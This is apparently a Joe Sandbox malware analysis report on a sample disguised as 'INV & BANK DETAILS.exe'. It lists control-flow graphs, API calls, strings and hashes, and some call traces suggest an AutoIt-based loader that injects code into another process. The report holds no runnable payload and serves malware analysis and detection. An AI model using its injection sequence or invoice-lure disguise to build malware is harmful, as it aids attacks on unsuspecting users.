                                control_flow_graph 2248 3cd2638-3cd26e6 call 3cd0048 2251 3cd26ed-3cd2713 call 3cd3548 CreateFileW 2248->2251 2254 3cd271a-3cd272a 2251->2254 2255 3cd2715 2251->2255 2260 3cd272c 2254->2260 2261 3cd2731-3cd274b VirtualAlloc 2254->2261 2256 3cd2865-3cd2869 2255->2256 2258 3cd28ab-3cd28ae 2256->2258 2259 3cd286b-3cd286f 2256->2259 2262 3cd28b1-3cd28b8 2258->2262 2263 3cd287b-3cd287f 2259->2263 2264 3cd2871-3cd2874 2259->2264 2260->2256 2267 3cd274d 2261->2267 2268 3cd2752-3cd2769 ReadFile 2261->2268 2269 3cd290d-3cd2922 2262->2269 2270 3cd28ba-3cd28c5 2262->2270 2265 3cd288f-3cd2893 2263->2265 2266 3cd2881-3cd288b 2263->2266 2264->2263 2273 3cd2895-3cd289f 2265->2273 2274 3cd28a3 2265->2274 2266->2265 2267->2256 2275 3cd276b 2268->2275 2276 3cd2770-3cd27b0 VirtualAlloc 2268->2276 2271 3cd2924-3cd292f VirtualFree 2269->2271 2272 3cd2932-3cd293a 2269->2272 2277 3cd28c9-3cd28d5 2270->2277 2278 3cd28c7 2270->2278 2271->2272 2273->2274 2274->2258 2275->2256 2279 3cd27b7-3cd27d2 call 3cd3798 2276->2279 2280 3cd27b2 2276->2280 2281 3cd28e9-3cd28f5 2277->2281 2282 3cd28d7-3cd28e7 2277->2282 2278->2269 2288 3cd27dd-3cd27e7 2279->2288 2280->2256 2285 3cd28f7-3cd2900 2281->2285 2286 3cd2902-3cd2908 2281->2286 2284 3cd290b 2282->2284 2284->2262 2285->2284 2286->2284 2289 3cd27e9-3cd2818 call 3cd3798 2288->2289 2290 3cd281a-3cd282e call 3cd35a8 2288->2290 2289->2288 2296 3cd2830 2290->2296 2297 3cd2832-3cd2836 2290->2297 2296->2256 2298 3cd2838-3cd283c CloseHandle 2297->2298 2299 3cd2842-3cd2846 2297->2299 2298->2299 2300 3cd2848-3cd2853 VirtualFree 2299->2300 2301 3cd2856-3cd285f 2299->2301 2300->2301 2301->2251 2301->2256
                                APIs
                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03CD2709
                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03CD292F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1431688567.0000000003CD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3cd0000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateFileFreeVirtual
                                • String ID:
                                • API String ID: 204039940-0
                                • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                • Instruction ID: 7145182ee7d2c4545f338adae6f26e329139f655d809e54e03ff89568855d85e
                                • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                • Instruction Fuzzy Hash: A9A11775E00208EBDB14CFA4C994BEEBBB5BF48305F248599E611FB280D7759A41CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2302 4102b0-4102c5 SHGetMalloc 2303 4102cb-4102da SHGetDesktopFolder 2302->2303 2304 425dfd-425e0e call 433244 2302->2304 2305 4102e0-41031a call 412fba 2303->2305 2306 41036b-410379 2303->2306 2314 410360-410368 2305->2314 2315 41031c-410331 SHGetPathFromIDListW 2305->2315 2306->2304 2312 41037f-410384 2306->2312 2314->2306 2316 410351-41035d 2315->2316 2317 410333-41034a call 412fba 2315->2317 2316->2314 2317->2316
                                APIs
                                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                • _wcsncpy.LIBCMT ref: 004102ED
                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                • _wcsncpy.LIBCMT ref: 00410340
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                • String ID: C:\Users\user\Desktop\INV & BANK DETAILS.exe
                                • API String ID: 3170942423-2024867800
                                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: QueryValue$CloseOpen
                                • String ID: Include$Software\AutoIt v3\AutoIt
                                • API String ID: 1586453840-614718249
                                • Opcode ID: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                • Opcode Fuzzy Hash: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                APIs
                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                • ShowWindow.USER32(?,00000000), ref: 004105E4
                                • ShowWindow.USER32(?,00000000), ref: 004105EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$CreateShow
                                • String ID: AutoIt v3$edit
                                • API String ID: 1584632944-3779509399
                                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                • String ID:
                                • API String ID: 1612042205-0
                                • Opcode ID: 90bc39558da55aafea0c644d420268c7464c042d06742de0e50a33b275c20799
                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                • Opcode Fuzzy Hash: 90bc39558da55aafea0c644d420268c7464c042d06742de0e50a33b275c20799
                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                APIs
                                  • Part of subcall function 03CD22E8: Sleep.KERNELBASE(000001F4), ref: 03CD22F9
                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03CD2523
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1431688567.0000000003CD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3cd0000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateFileSleep
                                • String ID: 9TKLA72KMQJBBXN9YJ2V54B
                                • API String ID: 2694422964-1534264233
                                • Opcode ID: 01ca286896f2f8428732ff4766efbfb4f2978827ec33de2167e021247c7226b3
                                • Instruction ID: 64b5995148d58587e9bb1d601503aa2ae3dbceb74bb90c2fce38ea144c98b961
                                • Opcode Fuzzy Hash: 01ca286896f2f8428732ff4766efbfb4f2978827ec33de2167e021247c7226b3
                                • Instruction Fuzzy Hash: 6851B170D04288EBEF11DBE4C854BEEBBB8AF15304F044599E648BB2C1D7BA4B45CB65
                                APIs
                                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Close$OpenQueryValue
                                • String ID: Control Panel\Mouse
                                • API String ID: 1607946009-824357125
                                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID: Wu
                                • API String ID: 0-4083010176
                                • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Process$CurrentTerminate
                                • String ID: Wu
                                • API String ID: 2429186680-4083010176
                                • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                APIs
                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03CD1B15
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03CD1B39
                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03CD1B5B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1431688567.0000000003CD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3cd0000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                • Instruction ID: 936b8beb5e8c013ccc062854b35f8fc4e9374ba9887a009f0f659887ba27779c
                                • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                • Instruction Fuzzy Hash: A3620B70A14258DBEB24CFA4C844BDEB376EF58300F1491A9E20DEB394E7759E81CB59
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                • String ID:
                                • API String ID: 2782032738-0
                                • Opcode ID: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                • Opcode Fuzzy Hash: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                APIs
                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                • _free.LIBCMT ref: 004295A0
                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\INV & BANK DETAILS.exe
                                • API String ID: 3938964917-1592106578
                                • Opcode ID: 555983b13ccae5a08c0cf578c9aebbeba2409cdf92c4721f34d488a40831cc57
                                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                • Opcode Fuzzy Hash: 555983b13ccae5a08c0cf578c9aebbeba2409cdf92c4721f34d488a40831cc57
                                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: Error:
                                • API String ID: 4104443479-232661952
                                • Opcode ID: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                • Opcode Fuzzy Hash: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                APIs
                                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INV & BANK DETAILS.exe,0040F545,C:\Users\user\Desktop\INV & BANK DETAILS.exe,004A90E8,C:\Users\user\Desktop\INV & BANK DETAILS.exe,?,0040F545), ref: 0041013C
                                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                • String ID: X$pWH
                                • API String ID: 85490731-941433119
                                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __fread_nolock_memmove
                                • String ID: EA06
                                • API String ID: 1988441806-3962188686
                                • Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                • Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                Strings
                                • C:\Users\user\Desktop\INV & BANK DETAILS.exe, xrefs: 00410107
                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
